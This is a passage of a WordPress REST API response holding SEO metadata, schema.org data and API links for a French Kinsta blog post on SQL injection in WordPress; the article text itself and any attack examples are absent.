SEO v24.6) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress - Kinsta\u00ae<\/title>\n<meta name=\"description\" content=\"Apprenez ce qu&#039;est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d&#039;injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress\" \/>\n<meta property=\"og:description\" content=\"Apprenez ce qu&#039;est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d&#039;injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/\" \/>\n<meta property=\"og:site_name\" content=\"Kinsta\u00ae\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/kinstafrance\/\" \/>\n<meta property=\"article:published_time\" content=\"2020-01-14T08:42:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-02T14:16:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1460\" \/>\n\t<meta property=\"og:image:height\" content=\"730\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Shaumik Daityari\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:description\" content=\"Apprenez ce qu&#039;est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d&#039;injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg\" \/>\n<meta name=\"twitter:creator\" content=\"@kinsta_fr\" \/>\n<meta name=\"twitter:site\" content=\"@kinsta_fr\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Shaumik Daityari\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/\"},\"author\":{\"name\":\"Shaumik Daityari\",\"@id\":\"https:\/\/kinsta.com\/fr\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\"},\"headline\":\"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress\",\"datePublished\":\"2020-01-14T08:42:12+00:00\",\"dateModified\":\"2023-10-02T14:16:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/\"},\"wordCount\":3234,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/fr\/#organization\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg\",\"keywords\":[\"s\u00e9curit\u00e9 du site\",\"wordpresshack\"],\"articleSection\":[\"S\u00e9curit\u00e9 WordPress\"],\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/\",\"url\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/\",\"name\":\"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress - Kinsta\u00ae\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/fr\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg\",\"datePublished\":\"2020-01-14T08:42:12+00:00\",\"dateModified\":\"2023-10-02T14:16:24+00:00\",\"description\":\"Apprenez ce qu'est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d'injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.\",\"breadcrumb\":{\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage\",\"url\":\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg\",\"contentUrl\":\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg\",\"width\":1460,\"height\":730,\"caption\":\"Injection SQL\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/kinsta.com\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"D\u00e9veloppement WordPress\",\"item\":\"https:\/\/kinsta.com\/fr\/sujets\/developpement-wordpress\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kinsta.com\/fr\/#website\",\"url\":\"https:\/\/kinsta.com\/fr\/\",\"name\":\"Kinsta\u00ae\",\"description\":\"Solutions d&#039;h\u00e9bergement premium, rapides et s\u00e9curis\u00e9es\",\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/fr\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kinsta.com\/fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kinsta.com\/fr\/#organization\",\"name\":\"Kinsta\",\"url\":\"https:\/\/kinsta.com\/fr\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/kinsta.com\/fr\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2023\/12\/kinsta-logo.jpeg\",\"contentUrl\":\"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2023\/12\/kinsta-logo.jpeg\",\"width\":500,\"height\":500,\"caption\":\"Kinsta\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/fr\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/kinstafrance\/\",\"https:\/\/x.com\/kinsta_fr\",\"https:\/\/www.instagram.com\/kinstahosting\/\",\"https:\/\/www.linkedin.com\/company\/kinsta\/\",\"https:\/\/www.pinterest.com\/kinstahosting\/\",\"https:\/\/www.youtube.com\/c\/Kinsta\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kinsta.com\/fr\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\",\"name\":\"Shaumik Daityari\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/kinsta.com\/fr\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"caption\":\"Shaumik Daityari\"},\"description\":\"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!\",\"url\":\"https:\/\/kinsta.com\/fr\/blog\/author\/shaumikdaityari\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress - Kinsta\u00ae","description":"Apprenez ce qu'est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d'injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/","og_locale":"fr_FR","og_type":"article","og_title":"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress","og_description":"Apprenez ce qu'est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d'injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.","og_url":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/","og_site_name":"Kinsta\u00ae","article_publisher":"https:\/\/www.facebook.com\/kinstafrance\/","article_published_time":"2020-01-14T08:42:12+00:00","article_modified_time":"2023-10-02T14:16:24+00:00","og_image":[{"width":1460,"height":730,"url":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg","type":"image\/jpeg"}],"author":"Shaumik Daityari","twitter_card":"summary_large_image","twitter_description":"Apprenez ce qu'est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d'injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.","twitter_image":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg","twitter_creator":"@kinsta_fr","twitter_site":"@kinsta_fr","twitter_misc":{"\u00c9crit par":"Shaumik Daityari","Dur\u00e9e de lecture estim\u00e9e":"16 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#article","isPartOf":{"@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/"},"author":{"name":"Shaumik Daityari","@id":"https:\/\/kinsta.com\/fr\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036"},"headline":"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress","datePublished":"2020-01-14T08:42:12+00:00","dateModified":"2023-10-02T14:16:24+00:00","mainEntityOfPage":{"@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/"},"wordCount":3234,"commentCount":0,"publisher":{"@id":"https:\/\/kinsta.com\/fr\/#organization"},"image":{"@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg","keywords":["s\u00e9curit\u00e9 du site","wordpresshack"],"articleSection":["S\u00e9curit\u00e9 WordPress"],"inLanguage":"fr-FR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/","url":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/","name":"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress - Kinsta\u00ae","isPartOf":{"@id":"https:\/\/kinsta.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage"},"image":{"@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg","datePublished":"2020-01-14T08:42:12+00:00","dateModified":"2023-10-02T14:16:24+00:00","description":"Apprenez ce qu'est une injection SQL, comment la vuln\u00e9rabilit\u00e9 d'injection SQL peut exister dans vos applications web (comme les sites WordPress) et comment pr\u00e9venir les attaques.","breadcrumb":{"@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kinsta.com\/fr\/blog\/injections-sql\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#primaryimage","url":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg","contentUrl":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2020\/01\/injection-sql.jpg","width":1460,"height":730,"caption":"Injection SQL"},{"@type":"BreadcrumbList","@id":"https:\/\/kinsta.com\/fr\/blog\/injections-sql\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/kinsta.com\/fr\/"},{"@type":"ListItem","position":2,"name":"D\u00e9veloppement WordPress","item":"https:\/\/kinsta.com\/fr\/sujets\/developpement-wordpress\/"},{"@type":"ListItem","position":3,"name":"Injection SQL : Un guide d\u00e9taill\u00e9 pour les utilisateurs de WordPress"}]},{"@type":"WebSite","@id":"https:\/\/kinsta.com\/fr\/#website","url":"https:\/\/kinsta.com\/fr\/","name":"Kinsta\u00ae","description":"Solutions d&#039;h\u00e9bergement premium, rapides et s\u00e9curis\u00e9es","publisher":{"@id":"https:\/\/kinsta.com\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kinsta.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/kinsta.com\/fr\/#organization","name":"Kinsta","url":"https:\/\/kinsta.com\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/kinsta.com\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2023\/12\/kinsta-logo.jpeg","contentUrl":"https:\/\/kinsta.com\/fr\/wp-content\/uploads\/sites\/4\/2023\/12\/kinsta-logo.jpeg","width":500,"height":500,"caption":"Kinsta"},"image":{"@id":"https:\/\/kinsta.com\/fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/kinstafrance\/","https:\/\/x.com\/kinsta_fr","https:\/\/www.instagram.com\/kinstahosting\/","https:\/\/www.linkedin.com\/company\/kinsta\/","https:\/\/www.pinterest.com\/kinstahosting\/","https:\/\/www.youtube.com\/c\/Kinsta"]},{"@type":"Person","@id":"https:\/\/kinsta.com\/fr\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036","name":"Shaumik Daityari","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/kinsta.com\/fr\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","caption":"Shaumik Daityari"},"description":"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!","url":"https:\/\/kinsta.com\/fr\/blog\/author\/shaumikdaityari\/"}]}},"acf":[],"_links":{"self":[{"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/posts\/35985","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/comments?post=35985"}],"version-history":[{"count":12,"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/posts\/35985\/revisions"}],"predecessor-version":[{"id":73448,"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/posts\/35985\/revisions\/73448"}],"alternate":[{"embeddable":true,"hreflang":"en","title":"English","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/en"},{"embeddable":true,"hreflang":"fr","title":"French","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/fr"},{"embeddable":true,"hreflang":"es","title":"Spanish","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/es"},{"embeddable":true,"hreflang":"pt","title":"Portuguese","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/pt"},{"embeddable":true,"hreflang":"it","title":"Italian","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/it"},{"embeddable":true,"hreflang":"da","title":"Danish","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/dk"},{"embeddable":true,"hreflang":"nl","title":"Dutch","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/nl"},{"embeddable":true,"hreflang":"de","title":"German","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/de"},{"embeddable":true,"hreflang":"sv","title":"Swedish","href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/translations\/se"},{"href":"https:\/\/kinsta.com\/fr\/wp-json\/kinsta\/v1\/posts\/35985\/tree"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/media\/35988"}],"wp:attachment":[{"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/media?parent=35985"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/tags?post=35985"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/kinsta.com\/fr\/wp-json\/wp\/v2\/topic?post=35985"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}